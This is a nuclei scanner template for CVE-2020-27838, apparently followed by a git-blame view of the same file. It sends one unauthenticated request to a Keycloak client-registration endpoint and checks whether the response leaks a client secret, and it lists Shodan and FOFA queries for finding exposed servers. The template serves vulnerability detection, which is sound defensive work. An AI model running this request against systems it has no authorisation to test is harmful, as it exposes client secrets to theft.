nuclei-templates/http/cves/2020/CVE-2020-27838.yaml

id: CVE-2020-27838

info:
  name: KeyCloak - Information Exposure
  author: mchklt
  severity: medium
  description: |
    A flaw was found in keycloak in versions prior to 13.0.0. The client registration endpoint allows fetching information about PUBLIC clients (like client secret) without authentication which could be an issue if the same PUBLIC client changed to CONFIDENTIAL later. The highest threat from this vulnerability is to data confidentiality.
  impact: |
    The vulnerability allows an attacker to gain sensitive information from the KeyCloak server.
  remediation: |
    Apply the latest security patches or updates provided by the KeyCloak vendor.
  reference:
    - https://bugzilla.redhat.com/show_bug.cgi?id=1906797
    - https://nvd.nist.gov/vuln/detail/CVE-2020-27838
    - https://github.com/muneebaashiq/MBProjects
    - https://github.com/j4k0m/godkiller
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N
    cvss-score: 6.5
    cve-id: CVE-2020-27838
    cwe-id: CWE-287
    epss-score: 0.08135
    epss-percentile: 0.93734
    cpe: cpe:2.3:a:redhat:keycloak:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: redhat
    product: keycloak
    shodan-query:
      - "title:\"keycloak\""
      - http.title:"keycloak"
      - http.html:"keycloak"
      - http.favicon.hash:-1105083093
    fofa-query:
      - title="keycloak"
      - icon_hash=-1105083093
      - body="keycloak"
    google-query: intitle:"keycloak"
  tags: cve,cve2020,keycloak,exposure,redhat

http:
  - method: GET
    path:
      - "{{BaseURL}}/auth/realms/master/clients-registrations/default/security-admin-console"

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - '"clientId":\s*"security-admin-console"'
          - '"secret":'
        condition: and

      - type: word
        part: header
        words:
          - 'application/json'

      - type: status
        status:
          - 200
# digest: 4a0a00473045022075a12abb8d7c57a24c8ad7a00997a9a572da21c9e1131e500c6f77f352c3c557022100f4c157e6b030a4dd3fee892c2c6132443e51a8d9757b37b0147225053d401422:922c64590222798bb761d5b6d8e72950
Create CVE-2020-27838.yaml 2024-01-16 09:57:16 +00:00			`id: CVE-2020-27838`

			`info:`
			`name: KeyCloak - Information Exposure`
			`author: mchklt`
			`severity: medium`
			`description: \|`
			`A flaw was found in keycloak in versions prior to 13.0.0. The client registration endpoint allows fetching information about PUBLIC clients (like client secret) without authentication which could be an issue if the same PUBLIC client changed to CONFIDENTIAL later. The highest threat from this vulnerability is to data confidentiality.`
Update CVE-2020-27838.yaml 2024-01-16 21:13:58 +00:00			`impact: \|`
			`The vulnerability allows an attacker to gain sensitive information from the KeyCloak server.`
			`remediation: \|`
			`Apply the latest security patches or updates provided by the KeyCloak vendor.`
TemplateMan Update [Mon Jan 29 17:11:13 UTC 2024] :robot: 2024-01-29 17:11:14 +00:00			`reference:`
			`- https://bugzilla.redhat.com/show_bug.cgi?id=1906797`
			`- https://nvd.nist.gov/vuln/detail/CVE-2020-27838`
			`- https://github.com/muneebaashiq/MBProjects`
			`- https://github.com/j4k0m/godkiller`
Create CVE-2020-27838.yaml 2024-01-16 09:57:16 +00:00			`classification:`
			`cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N`
			`cvss-score: 6.5`
			`cve-id: CVE-2020-27838`
			`cwe-id: CWE-287`
TemplateMan Update [Mon Jan 29 17:11:13 UTC 2024] :robot: 2024-01-29 17:11:14 +00:00			`epss-score: 0.08135`
Revert "TemplateMan Update [Mon Apr 8 11:30:07 UTC 2024] :robot:" This reverts commit 433dda4ae5b824564b44075bb95a96ecdbe263a6. 2024-04-08 11:34:33 +00:00			`epss-percentile: 0.93734`
TemplateMan Update [Mon Jan 29 11:58:34 UTC 2024] :robot: 2024-01-29 11:58:34 +00:00			`cpe: cpe:2.3:a:redhat:keycloak::::::::`
Create CVE-2020-27838.yaml 2024-01-16 09:57:16 +00:00			`metadata:`
TemplateMan Update [Mon Jan 29 17:11:13 UTC 2024] :robot: 2024-01-29 17:11:14 +00:00			`max-request: 1`
Create CVE-2020-27838.yaml 2024-01-16 09:57:16 +00:00			`vendor: redhat`
			`product: keycloak`
TemplateMan Update [Fri Jun 7 10:04:28 UTC 2024] :robot: 2024-06-07 10:04:29 +00:00			`shodan-query:`
			`- "title:\"keycloak\""`
			`- http.title:"keycloak"`
			`- http.html:"keycloak"`
			`- http.favicon.hash:-1105083093`
			`fofa-query:`
			`- title="keycloak"`
			`- icon_hash=-1105083093`
			`- body="keycloak"`
product/queries updated 2024-05-31 19:23:20 +00:00			`google-query: intitle:"keycloak"`
TemplateMan Update [Fri Jun 7 10:04:28 UTC 2024] :robot: 2024-06-07 10:04:29 +00:00			`tags: cve,cve2020,keycloak,exposure,redhat`
Create CVE-2020-27838.yaml 2024-01-16 09:57:16 +00:00
			`http:`
			`- method: GET`
			`path:`
			`- "{{BaseURL}}/auth/realms/master/clients-registrations/default/security-admin-console"`
trailspace fix 2024-01-16 09:59:40 +00:00
Create CVE-2020-27838.yaml 2024-01-16 09:57:16 +00:00			`matchers-condition: and`
			`matchers:`
Solve FN 2024-06-25 09:02:24 +00:00			`- type: regex`
			`regex:`
			`- '"clientId":\s*"security-admin-console"'`
Create CVE-2020-27838.yaml 2024-01-16 09:57:16 +00:00			`- '"secret":'`
			`condition: and`

			`- type: word`
			`part: header`
			`words:`
			`- 'application/json'`

			`- type: status`
			`status:`
			`- 200`
Auto Template Signing [Tue Jun 25 12:22:39 UTC 2024] :robot: 2024-06-25 12:22:39 +00:00			`# digest: 4a0a00473045022075a12abb8d7c57a24c8ad7a00997a9a572da21c9e1131e500c6f77f352c3c557022100f4c157e6b030a4dd3fee892c2c6132443e51a8d9757b37b0147225053d401422:922c64590222798bb761d5b6d8e72950`